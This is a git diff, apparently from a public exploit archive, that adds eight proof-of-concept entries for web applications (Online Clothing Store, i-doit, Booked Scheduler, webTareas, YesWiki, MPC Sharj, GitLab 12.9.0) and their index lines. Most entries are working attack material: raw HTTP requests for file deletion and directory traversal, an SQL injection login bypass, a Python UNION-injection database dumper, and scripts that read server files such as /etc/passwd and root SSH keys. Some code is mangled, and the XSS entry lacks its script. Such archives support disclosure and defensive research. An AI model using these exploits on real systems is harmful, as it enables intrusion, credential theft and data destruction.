diff --git a/exploits/php/webapps/48426.txt b/exploits/php/webapps/48426.txt
new file mode 100644
index 000000000..d167c6bdd
--- /dev/null
+++ b/exploits/php/webapps/48426.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#Vulnerable Page: Offers.php
+#Parameter Vulnerable: Offer Detail
+
+ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS
+
+Admin user can add malicious script to offer page.
+when a normal user visit a page. A script gets executed.
+
+# Exploit:
+ Open offer.php
+ Add below script in Offer Detail
+
+ Save
\ No newline at end of file
diff --git a/exploits/php/webapps/48427.txt b/exploits/php/webapps/48427.txt
new file mode 100644
index 000000000..65cbf71fe
--- /dev/null
+++ b/exploits/php/webapps/48427.txt
@@ -0,0 +1,34 @@
+# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
+# Date: 2020-05-02
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.i-doit.org/
+# Software Link: https://sourceforge.net/projects/i-doit/
+# Version: v1.14.1
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+--------------------------------------------------------------------------------------------------
+
+Vulnerable Module ---> Import Module
+Vulnerable parameter ---> delete_import
+-----------
+PoC
+-----------
+
+POST /idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ******************************
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2
+X-Requested-With: XMLHttpRequest
+X-Prototype-Version: 1.7.3
+Content-type: application/x-www-form-urlencoded; charset=UTF-8
+X-i-doit-Tenant-Id: 1
+Content-Length: 30
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=bf21********************************68b8
+
+delete_import=Type the filename, you want to delete from the server here
\ No newline at end of file
diff --git a/exploits/php/webapps/48428.txt b/exploits/php/webapps/48428.txt
new file mode 100644
index 000000000..2edf57425
--- /dev/null
+++ b/exploits/php/webapps/48428.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
+# Date: 2020-05-03
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.bookedscheduler.com
+# Software Link: https://sourceforge.net/projects/phpscheduleit/
+# Version: v2.7.7
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+Description:
+----------------------------------------------------------
+Vulnerable Parameter: $tn
+Vulnerable File: manage_email_templates.php
+
+
+PoC
+-----------
+
+GET
+/booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***************************
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/booked/Web/admin/manage_email_templates.php
+X-Requested-With: XMLHttpRequest
+DNT: 1
+Connection: close
+Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441;
+PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec
\ No newline at end of file
diff --git a/exploits/php/webapps/48429.txt b/exploits/php/webapps/48429.txt
new file mode 100644
index 000000000..48861bb0d
--- /dev/null
+++ b/exploits/php/webapps/48429.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /online%20Clothing%20Store/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/online%20Clothing%20Store/
+Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7
+Upgrade-Insecure-Requests: 1
+
+txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login
\ No newline at end of file
diff --git a/exploits/php/webapps/48430.txt b/exploits/php/webapps/48430.txt
new file mode 100644
index 000000000..c86a85837
--- /dev/null
+++ b/exploits/php/webapps/48430.txt
@@ -0,0 +1,75 @@
+# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
+# Date: 2020-05-02
+# Author: Besim ALTINOK
+# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
+# Software Link: https://sourceforge.net/projects/webtareas/files/
+# Version: v2.0.p8
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+
+Description:
+--------------------------------------------------------------------------------------
+
+- print_layout.php is vulnerable. When you sent PoC code to the server and
+If there is no file on the server, you can see, this error message
+
+
+Warning:
+ unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip):
+No such file or directory in
+/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php
+on line 1303
+
+- So, Here, you can delete file with unlink function.
+- And, I ddi try again with another file, I deleted from the server.
+--------------------------------------------------------------------------------------------
+
+Arbitrary File Deletion PoC
+---------------------------------------------------------------------------------------
+
+POST
+/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
+Content-Type: multipart/form-data;
+boundary=---------------------------3678767312987982041084647942
+Content-Length: 882
+DNT: 1
+Connection: close
+Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730;
+PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="action"
+
+edit
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="desc"
+
+tester
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="file1"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="attnam1"
+
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="atttmp1"
+
+--add the delete file name here--
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="sp"
+
+
+-----------------------------3678767312987982041084647942--
\ No newline at end of file
diff --git a/exploits/php/webapps/48432.txt b/exploits/php/webapps/48432.txt
new file mode 100644
index 000000000..70c359c59
--- /dev/null
+++ b/exploits/php/webapps/48432.txt
@@ -0,0 +1,134 @@
+# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
+# Date: 2020-04-25
+# Exploit Author: coiffeur
+# Vendor Homepage: https://yeswiki.net/
+# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
+# Version: YesWiki cercopitheque < 2020-04-18-1
+
+import sys
+
+import requests
+
+DEBUG = 0
+
+
+def usage():
+ banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
+SYNOPSIS: python sqli_2020.04.18.1.py [OPTIONS]...
+DESCRIPTION:
+ -lt, list tables.
+ -dt , dump table.
+AUTHOR: coiffeur
+ """
+ print(banner)
+
+
+def parse(text):
+ deli_l = 'ABCAABBCC|'
+ deli_r = '|ABCAABBCC'
+ if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
+ print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
+ exit(-1)
+ start = text.find(deli_l) + len(deli_l)
+ end = start + text[start::].find(deli_r)
+ return text[start:end]
+
+
+def render(elements):
+ print(elements)
+
+def get_count(t_type, table_name=None, column_name=None):
+ if t_type == 'table':
+ payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ data = parse(r.text)
+ if t_type == 'column':
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ data = parse(r.text)
+ if t_type == 'element':
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ data = parse(r.text)
+ return int(data)
+
+
+def list_tables():
+ tables_count = get_count(t_type='table')
+ print(f'[+] Tables found: {tables_count}')
+
+ tables = []
+ for i in range(0, tables_count):
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ talbe = parse(r.text)
+ print(f'\t{talbe}')
+ tables.append(talbe)
+ return tables
+
+
+def list_columns(table_name):
+ columns_count = get_count(t_type='column', table_name=table_name)
+ print(f'[+] Columns found: {columns_count}')
+
+ columns = []
+ for i in range(0, columns_count):
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ column = parse(r.text)
+ if DEBUG > 0:
+ print(f'\t{column}')
+ columns.append(column)
+ return columns
+
+
+def dump_table(name):
+ columns = list_columns(name)
+ elements = [None]*len(columns)
+ for i in range(0, len(columns)):
+ elements_count = get_count(
+ t_type='element', table_name=name, column_name=columns[i])
+ if DEBUG > 0:
+ print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
+ element = []
+ for j in range(0, elements_count):
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ element.append(parse(r.text))
+ if DEBUG > 0:
+ print(f'\t{element[-1]}')
+ elements[i] = element
+ render(elements)
+ return elements
+
+
+def main():
+ if len(sys.argv) < 3:
+ print(usage())
+ exit(-1)
+
+ if sys.argv[2] == '-lt':
+ list_tables()
+
+ if sys.argv[2] == '-dt':
+ dump_table(sys.argv[3])
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48433.txt b/exploits/php/webapps/48433.txt
new file mode 100644
index 000000000..1ba45ee64
--- /dev/null
+++ b/exploits/php/webapps/48433.txt
@@ -0,0 +1,69 @@
+# Exploit title : MPC Sharj 3.11.1 - Arbitrary File Download
+# Exploit Author : SajjadBnd
+# Date : 2020-05-02
+# Software Link : http://dl.nuller.ir/mpc-sharj-vr_3.11.1_beta[www.nuller.ir].zip
+# Tested on : Ubuntu 19.10
+# Version : 3.11.1 Beta
+############################
+#
+# [ DESCRIPTION ]
+#
+# MPC Sharj is a free open source script for creating sim card credit card's shop.
+#
+# [POC]
+#
+# Vulnerable file: download.php
+# parameter : GET/ "id"
+# 69: readfile readfile($file);
+# 55: $file = urldecode(base64_decode(strrev($file)));
+# 53: $file = trim(strip_tags($_GET['id']));
+#
+# payload : [
+# Steps:
+#
+# 1. convert your payload (/etc/passwd) to base64 (L2V0Yy9wYXNzd2Q=)
+# 2. convert base64 result (L2V0Yy9wYXNzd2Q=) to strrev (=Q2dzNXYw9yY0V2L)
+# 3. your payload is ready ;D
+# http://localhost/download.php?id==Q2dzNXYw9yY0V2L
+#
+#]
+#
+
+import requests
+import os
+from base64 import b64encode
+
+def clear():
+linux = 'clear'
+windows = 'cls'
+os.system([linux, windows][os.name == 'nt'])
+
+def banner():
+print '''
+##############################################################
+##############################################################
+#### # ######### # #### ######### #####
+#### ### ###### ## #### ###### #### ############# #####
+#### #### #### ### #### ###### #### ###################
+#### ##### ## #### #### ####### ###################
+#### ###### ##### #### ############ ###################
+#### ############### #### ############ ############# #####
+#### ############### #### ##666######### ######
+##############################################################
+##############################################################
+###### MPC Sharj 3.11.1 Beta - Arbitrary File Download #####
+##############################################################
+'''
+
+def exploit():
+target = raw_input('[+] Target(http://example.com) => ')
+read_file = raw_input('[+] File to Read => ')
+read_file = b64encode(read_file)
+target = target+"/download.php?id"+read_file[::-1]
+r = requests.get(target,timeout=500)
+print "\n"+r.text
+
+if __name__ == '__main__':
+clear()
+banner()
+exploit()
\ No newline at end of file
diff --git a/exploits/ruby/webapps/48431.txt b/exploits/ruby/webapps/48431.txt
new file mode 100644
index 000000000..7eb8f50df
--- /dev/null
+++ b/exploits/ruby/webapps/48431.txt
@@ -0,0 +1,251 @@
+# Exploit Title: GitLab 12.9.0 - Arbitrary File Read
+# Google Dork: -
+# Date: 2020-05-03
+# Exploit Author: KouroshRZ
+# Vendor Homepage: https://about.gitlab.com
+# Software Link: https://about.gitlab.com/install
+# Version: tested on gitlab version 12.9.0
+# Tested on: Ubuntu 18.04 (but it's OS independent)
+# CVE : -
+
+#####################################################################################################
+# #
+# Copyright (c) 2020, William Bowling of Biteable, a.k.a vakzz #
+# All rights reserved. #
+# #
+# Redistribution and use in source and compiled forms, with or without modification, are permitted #
+# provided that the following conditions are met: #
+# #
+# * Redistributions of source code must retain the above copyright notice, this list of #
+# conditions and the following disclaimer. #
+# #
+# * Redistributions in compiled form must reproduce the above copyright notice, this list of #
+# conditions and the following disclaimer in the documentation and/or other materials provided #
+# with the distribution. #
+# #
+# * Neither the name of William Bowling nor the names of Biteable, a.k.a vakzz may be used to #
+# endorse or promote products derived from this software without specific prior written permission. #
+# #
+#####################################################################################################
+
+# Exploit Title: automated exploit for Arbitrary file read via the UploadsRewriter when moving and issue in private gitlab server
+# Google Dork: -
+# Date: 05/03/2020
+# Exploit Author: KouroshRZ
+# Vendor Homepage: https://about.gitlab.com
+# Software Link: https://about.gitlab.com/install
+# Version: tested on gitlab version 12.9.0
+# Tested on: Ubuntu 18.04 (but it's OS independent)
+# CVE : -
+
+import requests
+import json
+from time import sleep
+
+# For debugging
+proxies = {
+ 'http' : '127.0.0.1:8080',
+ 'https' : '127.0.0.1:8080'
+}
+
+session = requests.Session()
+
+# config
+host = 'http[s]://'
+username = ''
+password = ''
+lastIssueUrl = ""
+
+def loginToGitLab(username, password):
+
+ initLoginUrl = '{}/users/sign_in'.format(host)
+
+ initLoginResult = session.get(initLoginUrl).text
+
+ temp_index_csrf_param_start = initLoginResult.find("csrf-param")
+ temp_index_csrf_param_end = initLoginResult.find("/>", temp_index_csrf_param_start)
+ csrf_param = initLoginResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+ temp_index_csrf_token_start = initLoginResult.find("csrf-token")
+ temp_index_csrf_token_end = initLoginResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initLoginResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ submitLoginUrl = '{}/users/auth/ldapmain/callback'.format(host)
+
+ submitLoginData = {
+ 'utf8=' : '✓',
+ csrf_param : csrf_token,
+ 'username' : username,
+ 'password' : password,
+ }
+
+ submitLoginResult = session.post(submitLoginUrl, submitLoginData, allow_redirects=False)
+
+ if submitLoginResult.status_code == 302 and submitLoginResult.text.find('redirected') > -1:
+ print("[+] You'e logged in ...")
+
+
+def createNewProject(projectName):
+
+
+ initProjectUrl = '{}/projects/new'.format(host)
+
+ initProjectResult = session.get(initProjectUrl).text
+
+ temp_index_csrf_param_start = initProjectResult.find("csrf-param")
+ temp_index_csrf_param_end = initProjectResult.find("/>", temp_index_csrf_param_start)
+ csrf_param = initProjectResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+ temp_index_csrf_token_start = initProjectResult.find("csrf-token")
+ temp_index_csrf_token_end = initProjectResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initProjectResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ tmp_index_1 = initProjectResult.find('{}/{}/\n'.format(host, username))
+ tmp_index_2 = initProjectResult.find('value', tmp_index_1)
+ tmp_index_3 = initProjectResult.find('type', tmp_index_2)
+ namespace = initProjectResult[tmp_index_2 + 7 : tmp_index_3 - 2]
+
+ createProjectUrl = '{}/projects'.format(host)
+ createProjectData = {
+ 'utf8=' : '✓',
+ csrf_param : csrf_token,
+ 'project[ci_cd_only]' : 'false',
+ 'project[name]' : projectName,
+ 'project[namespace_id]' : namespace,
+ 'project[path]' : projectName,
+ 'project[description]' : '',
+ 'project[visibility_level]' : '0'
+ }
+
+ createProjectResult = session.post(createProjectUrl, createProjectData, allow_redirects=False)
+
+ if createProjectResult.status_code == 302:
+
+ print("[+] New Project {} created ...".format(projectName))
+
+def createNewIssue(projectName, issueTitle, file):
+
+ global lastIssueUrl
+
+ initIssueUrl = '{}/{}/{}/-/issues/new'.format(host, username, projectName)
+
+ initIssueResult = session.get(initIssueUrl).text
+
+ temp_index_csrf_param_start = initIssueResult.find("csrf-param")
+ temp_index_csrf_param_end = initIssueResult.find("/>", temp_index_csrf_param_start)
+ csrf_param = initIssueResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+ temp_index_csrf_token_start = initIssueResult.find("csrf-token")
+ temp_index_csrf_token_end = initIssueResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initIssueResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ createIssueUrl = '{}/{}/{}/-/issues'.format(host , username, projectName)
+
+ createIssueData = {
+ 'utf8=' : '✓',
+ csrf_param : csrf_token,
+ 'issue[title]' : issueTitle,
+ 'issue[description]' : ''.format(file),
+ 'issue[confidential]' : '0',
+ 'issue[assignee_ids][]' : '0',
+ 'issue[label_ids][]' : '',
+ 'issue[due_date]' : '',
+ 'issue[lock_version]' : '0'
+ }
+
+ createIssueResult = session.post(createIssueUrl, createIssueData, allow_redirects=False)
+
+ if createIssueResult.status_code == 302:
+
+ print("[+] New issue for {} created ...".format(projectName))
+ tmp_index_1 = createIssueResult.text.find("href")
+ tmp_index_2 = createIssueResult.text.find("redirected")
+ lastIssueUrl = createIssueResult.text[tmp_index_1 + 6: tmp_index_2 - 2]
+ print("[+] url of craeted issue : {}\n".format(lastIssueUrl))
+
+def moveLastIssue(source, destination, file):
+
+ # Get destination project ID
+
+ getProjectIdUrl = '{}/{}/{}'.format(host, username, destination)
+ getProjectIdResult = session.get(getProjectIdUrl).text
+
+ tmpIndex = getProjectIdResult.find('/search?project_id')
+ projectId = getProjectIdResult[tmpIndex + 19 : tmpIndex + 21]
+ #print("Project : {} ID ----> {}\n".format(destination, projectId))
+
+ # Get CSRF token for moving issue
+ # initIssueMoveUrl = '{}/{}/{}/-/issues/{}'.format(host, username, source, issue)
+ initIssueMoveUrl = lastIssueUrl
+ initIssueMoveResult = session.get(initIssueMoveUrl).text
+
+ temp_index_csrf_token_start = initIssueMoveResult.find("csrf-token")
+ temp_index_csrf_token_end = initIssueMoveResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initIssueMoveResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ # Move issue with associated CSRF token
+ # moveIssueUrl = "{}/{}/{}/-/issues/{}/move".format(host, username, source, issue)
+ moveIssueUrl = lastIssueUrl + "/move"
+ moveIssueData = json.dumps({
+ "move_to_project_id" : int(projectId)
+ })
+ headers = {
+ 'X-CSRF-Token' : csrf_token,
+ 'X-Requested-With' : 'XMLHttpRequest',
+ 'Content-Type' : 'application/json;charset=utf-8'
+ }
+ moveIssueResult = session.post(moveIssueUrl, headers = headers, data = moveIssueData, allow_redirects = False)
+
+ if moveIssueResult.status_code == 500:
+ print("[!] Permission denied for {}".format(file))
+ else:
+ description = json.loads(moveIssueResult.text)["description"]
+ tmp_index = description.find("/")
+ fileUrl = "{}/{}/{}/{}".format(host, username, destination, description[tmp_index+1:-1])
+
+ print("[+] url of file {}: \n".format(f, fileUrl))
+ fileContentResult = session.get(fileUrl)
+
+ if fileContentResult.status_code == 404:
+ print("[-] No such file or directory : {}".format(f))
+ else:
+ print("[+] Content of file {} read from server ...\n\n".format(f))
+ print(fileContentResult.text)
+
+ print("\n****************************************************************************************\n")
+
+
+
+if __name__ == "__main__":
+
+ loginToGitLab(username, password)
+
+ createNewProject("project_01")
+ createNewProject("project_02")
+
+ # Put the files you want to read from server here
+ # The files on server should have **4 or more permission (world readable files)
+ files = {
+ '/etc/passwd',
+ '/etc/ssh/sshd_config',
+ '/etc/ssh/ssh_config',
+ '/root/.ssh/id_rsa',
+ '/var/log/auth.log'
+ # ...
+ # ...
+ # ...
+ }
+
+
+ for f in files:
+ createNewIssue("project_01", "issue01_{}".format(f), f)
+ moveLastIssue("project_01", "project_02",f)
+ sleep(3)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 82e11bce7..88b87f0df 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42658,3 +42658,11 @@ id,file,description,date,author,type,platform,port
48423,exploits/php/webapps/48423.txt,"PhreeBooks ERP 5.2.5 - Remote Command Execution",2020-05-05,Besim,webapps,php,
48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,
48425,exploits/hardware/webapps/48425.txt,"NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration",2020-05-05,"Cold z3ro",webapps,hardware,
+48426,exploits/php/webapps/48426.txt,"Online Clothing Store 1.0 - Persistent Cross-Site Scripting",2020-05-06,"Sushant Kamble",webapps,php,
+48427,exploits/php/webapps/48427.txt,"i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion",2020-05-06,Besim,webapps,php,
+48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,
+48429,exploits/php/webapps/48429.txt,"Online Clothing Store 1.0 - 'username' SQL Injection",2020-05-06,"Sushant Kamble",webapps,php,
+48430,exploits/php/webapps/48430.txt,"webTareas 2.0.p8 - Arbitrary File Deletion",2020-05-06,Besim,webapps,php,
+48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby,
+48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php,
+48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,